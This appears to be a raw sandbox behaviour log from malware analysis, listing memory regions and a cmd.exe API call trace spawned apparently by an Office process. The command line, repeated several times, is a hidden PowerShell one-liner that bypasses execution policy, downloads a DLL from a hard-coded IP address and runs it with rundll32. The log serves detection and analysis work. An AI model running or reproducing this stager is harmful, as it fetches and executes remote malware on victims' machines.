entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Region: id = 688 start_va = 0xa930000 end_va = 0xaa7bfff entry_point = 0xa930000 region_type = mapped_file name = "mssp7en.lex" filename = "\\Program Files\\Microsoft Office\\Office15\\PROOF\\MSSP7EN.LEX" (normalized: "c:\\program files\\microsoft office\\office15\\proof\\mssp7en.lex") Region: id = 689 start_va = 0x5f030000 end_va = 0x5f8c2fff entry_point = 0x5f030000 region_type = mapped_file name = "igx.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\IGX.DLL" (normalized: "c:\\program files\\microsoft office\\office15\\igx.dll") Region: id = 690 start_va = 0x5f8d0000 end_va = 0x5fe59fff entry_point = 0x5f8d0000 region_type = mapped_file name = "nl7models0009.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\NL7MODELS0009.dll" (normalized: "c:\\program files\\microsoft office\\office15\\nl7models0009.dll") Region: id = 691 start_va = 0x71e90000 end_va = 0x71eaafff entry_point = 0x71e90000 region_type = mapped_file name = "mscss7wre_en.dub" filename = "\\Program Files\\Microsoft Office\\Office15\\mscss7wre_en.dub" (normalized: "c:\\program files\\microsoft office\\office15\\mscss7wre_en.dub") Region: id = 692 start_va = 0x71fd0000 end_va = 0x71fd2fff entry_point = 0x71fd0000 region_type = mapped_file name = "mscss7cm_en.dub" filename = "\\Program Files\\Microsoft Office\\Office15\\mscss7cm_en.dub" (normalized: "c:\\program files\\microsoft office\\office15\\mscss7cm_en.dub") Thread: id = 1 os_tid = 0x9c4 Thread: id = 2 os_tid = 0x9c0 Thread: id = 3 os_tid = 0x9bc Thread: id = 4 os_tid = 0x9b8 Thread: id = 5 os_tid = 0x9b4 Thread: id = 6 os_tid = 0x9b0 Thread: id = 7 os_tid = 0x9a4 Thread: id = 8 os_tid = 0x9a0 Thread: id = 9 os_tid = 0x99c Thread: id = 10 os_tid = 0x998 Thread: id = 11 os_tid = 0x994 Thread: id = 12 os_tid = 0x990 Thread: id = 13 os_tid = 0xa0c Thread: id = 21 os_tid = 0xa94 Thread: id = 175 os_tid = 0xd24 Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7eef7640" os_pid = "0xa38" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x98c" cmd_line = "c:\\Windows\\System32\\cmd.exe /k powershell.exe -ep Bypass -w Hidden -noprofile -noexit -c IEX (new-object System.Net.WebClient).DownloadFile('http://213.183.51.187/debug.dll','%temp%debug.dll');rundll32.exe '%temp%debug.dll' HOK " cur_dir = "C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 405 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 406 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 407 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 408 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 409 start_va = 0x49e50000 end_va = 0x49e9bfff entry_point = 0x49e50000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 410 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 411 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 412 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 413 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 414 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 415 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 416 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 417 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 418 start_va = 0x410000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 419 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 420 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 421 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 422 start_va = 0x721b0000 end_va = 0x721b6fff entry_point = 0x721b0000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 423 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 424 start_va = 0x76830000 end_va = 0x76839fff entry_point = 0x7683136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 425 start_va = 0x76840000 end_va = 0x7688dfff entry_point = 0x76849c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 426 start_va = 0x76890000 end_va = 0x76958fff entry_point = 0x768ad711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 427 start_va = 0x76e60000 end_va = 0x76efcfff entry_point = 0x76e93fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 428 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 429 start_va = 0x190000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 430 start_va = 0x757c0000 end_va = 0x7588bfff entry_point = 0x757c168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 431 start_va = 0x77400000 end_va = 0x7741efff entry_point = 0x77401355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 432 start_va = 0x1a0000 end_va = 0x1a6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 433 start_va = 0x1b0000 end_va = 0x1b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 434 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 435 start_va = 0x2d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 436 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 437 start_va = 0x510000 end_va = 0x110ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 438 start_va = 0x1110000 end_va = 0x1272fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001110000" filename = "" Region: id = 439 start_va = 0x1280000 end_va = 0x154efff entry_point = 0x1280000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 14 os_tid = 0xa3c [0020.711] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf8dc | out: lpSystemTimeAsFileTime=0x2cf8dc*(dwLowDateTime=0x3de0cc50, dwHighDateTime=0x1d34280)) [0020.711] GetCurrentProcessId () returned 0xa38 [0020.711] GetCurrentThreadId () returned 0xa3c [0020.711] GetTickCount () returned 0xd3e1 [0020.711] QueryPerformanceCounter (in: lpPerformanceCount=0x2cf8d4 | out: lpPerformanceCount=0x2cf8d4*=220260120) returned 1 [0020.712] GetModuleHandleA (lpModuleName=0x0) returned 0x49e50000 [0020.712] __set_app_type (_Type=0x1) [0020.712] __p__fmode () returned 0x768231f4 [0020.713] __p__commode () returned 0x768231fc [0020.713] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e721a6) returned 0x0 [0020.713] __getmainargs (in: _Argc=0x49e74238, _Argv=0x49e74240, _Env=0x49e7423c, _DoWildCard=0, _StartInfo=0x49e74140 | out: _Argc=0x49e74238, _Argv=0x49e74240, _Env=0x49e7423c) returned 0 [0020.713] GetCurrentThreadId () returned 0xa3c [0020.713] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa3c) returned 0x38 [0020.713] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76590000 [0020.714] GetProcAddress (hModule=0x76590000, lpProcName="SetThreadUILanguage") returned 0x765e24c2 [0020.714] SetThreadUILanguage (LangId=0x0) returned 0x409 [0020.714] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0020.714] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cf86c | out: phkResult=0x2cf86c*=0x0) returned 0x2 [0020.714] VirtualQuery (in: lpAddress=0x2cf8a3, lpBuffer=0x2cf83c, dwLength=0x1c | out: lpBuffer=0x2cf83c*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0020.714] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cf83c, dwLength=0x1c | out: lpBuffer=0x2cf83c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0020.714] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cf83c, dwLength=0x1c | out: lpBuffer=0x2cf83c*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0020.714] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cf83c, dwLength=0x1c | out: lpBuffer=0x2cf83c*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0020.714] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cf83c, dwLength=0x1c | out: lpBuffer=0x2cf83c*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0020.714] GetConsoleOutputCP () returned 0x1b5 [0020.714] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e74260 | out: lpCPInfo=0x49e74260) returned 1 [0020.714] SetConsoleCtrlHandler (HandlerRoutine=0x49e6e72a, Add=1) returned 1 [0020.714] _get_osfhandle (_FileHandle=1) returned 0x7 [0020.714] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0020.715] _get_osfhandle (_FileHandle=1) returned 0x7 [0020.715] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e741ac | out: lpMode=0x49e741ac) returned 1 [0020.715] _get_osfhandle (_FileHandle=1) returned 0x7 [0020.715] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0020.715] _get_osfhandle (_FileHandle=0) returned 0x3 [0020.715] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e741b0 | out: lpMode=0x49e741b0) returned 1 [0020.716] _get_osfhandle (_FileHandle=0) returned 0x3 [0020.716] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0020.716] GetEnvironmentStringsW () returned 0x420360* [0020.716] FreeEnvironmentStringsW (penv=0x420360) returned 1 [0020.716] GetEnvironmentStringsW () returned 0x420360* [0020.716] FreeEnvironmentStringsW (penv=0x420360) returned 1 [0020.716] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce7dc | out: phkResult=0x2ce7dc*=0x40) returned 0x0 [0020.716] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce7e4, lpData=0x2ce7e8, lpcbData=0x2ce7e0*=0x1000 | out: lpType=0x2ce7e4*=0x0, lpData=0x2ce7e8*=0x10, lpcbData=0x2ce7e0*=0x1000) returned 0x2 [0020.716] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce7e4, lpData=0x2ce7e8, lpcbData=0x2ce7e0*=0x1000 | out: lpType=0x2ce7e4*=0x4, lpData=0x2ce7e8*=0x1, lpcbData=0x2ce7e0*=0x4) returned 0x0 [0020.716] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce7e4, lpData=0x2ce7e8, lpcbData=0x2ce7e0*=0x1000 | out: lpType=0x2ce7e4*=0x0, lpData=0x2ce7e8*=0x1, lpcbData=0x2ce7e0*=0x1000) returned 0x2 [0020.716] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce7e4, lpData=0x2ce7e8, lpcbData=0x2ce7e0*=0x1000 | out: lpType=0x2ce7e4*=0x4, lpData=0x2ce7e8*=0x0, lpcbData=0x2ce7e0*=0x4) returned 0x0 [0020.717] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce7e4, lpData=0x2ce7e8, lpcbData=0x2ce7e0*=0x1000 | out: lpType=0x2ce7e4*=0x4, lpData=0x2ce7e8*=0x40, lpcbData=0x2ce7e0*=0x4) returned 0x0 [0020.717] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce7e4, lpData=0x2ce7e8, lpcbData=0x2ce7e0*=0x1000 | out: lpType=0x2ce7e4*=0x4, lpData=0x2ce7e8*=0x40, lpcbData=0x2ce7e0*=0x4) returned 0x0 [0020.717] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce7e4, lpData=0x2ce7e8, lpcbData=0x2ce7e0*=0x1000 | out: lpType=0x2ce7e4*=0x0, lpData=0x2ce7e8*=0x40, lpcbData=0x2ce7e0*=0x1000) returned 0x2 [0020.717] RegCloseKey (hKey=0x40) returned 0x0 [0020.717] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce7dc | out: phkResult=0x2ce7dc*=0x40) returned 0x0 [0020.717] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce7e4, lpData=0x2ce7e8, lpcbData=0x2ce7e0*=0x1000 | out: lpType=0x2ce7e4*=0x0, lpData=0x2ce7e8*=0x40, lpcbData=0x2ce7e0*=0x1000) returned 0x2 [0020.717] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce7e4, lpData=0x2ce7e8, lpcbData=0x2ce7e0*=0x1000 | out: lpType=0x2ce7e4*=0x4, lpData=0x2ce7e8*=0x1, lpcbData=0x2ce7e0*=0x4) returned 0x0 [0020.717] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce7e4, lpData=0x2ce7e8, lpcbData=0x2ce7e0*=0x1000 | out: lpType=0x2ce7e4*=0x0, lpData=0x2ce7e8*=0x1, lpcbData=0x2ce7e0*=0x1000) returned 0x2 [0020.717] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce7e4, lpData=0x2ce7e8, lpcbData=0x2ce7e0*=0x1000 | out: lpType=0x2ce7e4*=0x4, lpData=0x2ce7e8*=0x0, lpcbData=0x2ce7e0*=0x4) returned 0x0 [0020.717] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce7e4, lpData=0x2ce7e8, lpcbData=0x2ce7e0*=0x1000 | out: lpType=0x2ce7e4*=0x4, lpData=0x2ce7e8*=0x9, lpcbData=0x2ce7e0*=0x4) returned 0x0 [0020.717] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce7e4, lpData=0x2ce7e8, lpcbData=0x2ce7e0*=0x1000 | out: lpType=0x2ce7e4*=0x4, lpData=0x2ce7e8*=0x9, lpcbData=0x2ce7e0*=0x4) returned 0x0 [0020.717] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce7e4, lpData=0x2ce7e8, lpcbData=0x2ce7e0*=0x1000 | out: lpType=0x2ce7e4*=0x0, lpData=0x2ce7e8*=0x9, lpcbData=0x2ce7e0*=0x1000) returned 0x2 [0020.717] RegCloseKey (hKey=0x40) returned 0x0 [0020.717] time (in: timer=0x0 | out: timer=0x0) returned 0x59ddf9f4 [0020.717] srand (_Seed=0x59ddf9f4) [0020.717] GetCommandLineW () returned="c:\\Windows\\System32\\cmd.exe /k powershell.exe -ep Bypass -w Hidden -noprofile -noexit -c IEX (new-object System.Net.WebClient).DownloadFile('http://213.183.51.187/debug.dll','%temp%debug.dll');rundll32.exe '%temp%debug.dll' HOK " [0020.717] GetCommandLineW () returned="c:\\Windows\\System32\\cmd.exe /k powershell.exe -ep Bypass -w Hidden -noprofile -noexit -c IEX (new-object System.Net.WebClient).DownloadFile('http://213.183.51.187/debug.dll','%temp%debug.dll');rundll32.exe '%temp%debug.dll' HOK " [0020.718] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e75260 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 0x20 [0020.718] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x421c58, nSize=0x104 | out: lpFilename="c:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0020.719] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0020.719] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0020.720] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0020.720] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0020.720] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0020.720] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0020.720] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0020.720] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0020.720] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0020.720] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0020.720] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0020.720] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0020.720] GetEnvironmentStringsW () returned 0x4226d0* [0020.720] FreeEnvironmentStringsW (penv=0x4226d0) returned 1 [0020.720] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0020.720] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0020.720] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0020.720] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0020.720] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0020.720] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0020.720] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0020.720] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0020.720] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0020.720] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0020.720] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf5a8 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 0x20 [0020.720] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf5a8, lpFilePart=0x2cf5a4 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x2cf5a4*="Desktop") returned 0x20 [0020.720] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\desktop")) returned 0x11 [0020.720] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf324 | out: lpFindFileData=0x2cf324) returned 0x4201e0 [0020.721] FindClose (in: hFindFile=0x4201e0 | out: hFindFile=0x4201e0) returned 1 [0020.721] FindFirstFileW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR", lpFindFileData=0x2cf324 | out: lpFindFileData=0x2cf324) returned 0x4201e0 [0020.721] FindClose (in: hFindFile=0x4201e0 | out: hFindFile=0x4201e0) returned 1 [0020.721] _wcsnicmp (_String1="BGC6U8~1", _String2="BGC6u8Oy yXGxkR", _MaxCount=0xf) returned 15 [0020.721] FindFirstFileW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFindFileData=0x2cf324 | out: lpFindFileData=0x2cf324) returned 0x4201e0 [0020.721] FindClose (in: hFindFile=0x4201e0 | out: hFindFile=0x4201e0) returned 1 [0020.721] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\desktop")) returned 0x11 [0020.721] SetCurrentDirectoryW (lpPathName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\desktop")) returned 1 [0020.721] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 1 [0020.721] GetEnvironmentStringsW () returned 0x422f80* [0020.721] FreeEnvironmentStringsW (penv=0x422f80) returned 1 [0020.721] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e75260 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 0x20 [0020.722] GetConsoleOutputCP () returned 0x1b5 [0020.722] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e74260 | out: lpCPInfo=0x49e74260) returned 1 [0020.722] GetUserDefaultLCID () returned 0x409 [0020.722] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49e74950, cchData=8 | out: lpLCData=":") returned 2 [0020.722] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2cf6e8, cchData=128 | out: lpLCData="0") returned 2 [0020.722] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2cf6e8, cchData=128 | out: lpLCData="0") returned 2 [0020.722] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2cf6e8, cchData=128 | out: lpLCData="1") returned 2 [0020.722] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49e74940, cchData=8 | out: lpLCData="/") returned 2 [0020.722] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49e74d80, cchData=32 | out: lpLCData="Mon") returned 4 [0020.723] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49e74d40, cchData=32 | out: lpLCData="Tue") returned 4 [0020.723] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49e74d00, cchData=32 | out: lpLCData="Wed") returned 4 [0020.723] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49e74cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0020.723] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49e74c80, cchData=32 | out: lpLCData="Fri") returned 4 [0020.723] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49e74c40, cchData=32 | out: lpLCData="Sat") returned 4 [0020.723] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49e74c00, cchData=32 | out: lpLCData="Sun") returned 4 [0020.723] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49e74930, cchData=8 | out: lpLCData=".") returned 2 [0020.723] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49e74920, cchData=8 | out: lpLCData=",") returned 2 [0020.723] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0020.724] GetConsoleTitleW (in: lpConsoleTitle=0x410998, nSize=0x104 | out: lpConsoleTitle="c:\\Windows\\System32\\cmd.exe") returned 0x1b [0020.724] _get_osfhandle (_FileHandle=1) returned 0x7 [0020.724] GetFileType (hFile=0x7) returned 0x2 [0020.724] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0020.724] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf7e4 | out: lpMode=0x2cf7e4) returned 1 [0020.724] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0020.724] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf800 | out: lpConsoleScreenBufferInfo=0x2cf800) returned 1 [0020.724] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0020.724] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf7cc | out: lpConsoleScreenBufferInfo=0x2cf7cc) returned 1 [0020.725] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x2cf7e4 | out: lpNumberOfAttrsWritten=0x2cf7e4) returned 1 [0020.725] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1 [0020.726] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76590000 [0020.726] GetProcAddress (hModule=0x76590000, lpProcName="CopyFileExW") returned 0x765cac6c [0020.726] GetProcAddress (hModule=0x76590000, lpProcName="IsDebuggerPresent") returned 0x765d3ea8 [0020.726] GetProcAddress (hModule=0x76590000, lpProcName="SetConsoleInputExeNameW") returned 0x765e2732 [0020.728] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp") returned 0x24 [0020.728] GetEnvironmentVariableW (in: lpName="temp", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp") returned 0x24 [0020.728] _wcsicmp (_String1="powershell.exe", _String2=")") returned 71 [0020.729] 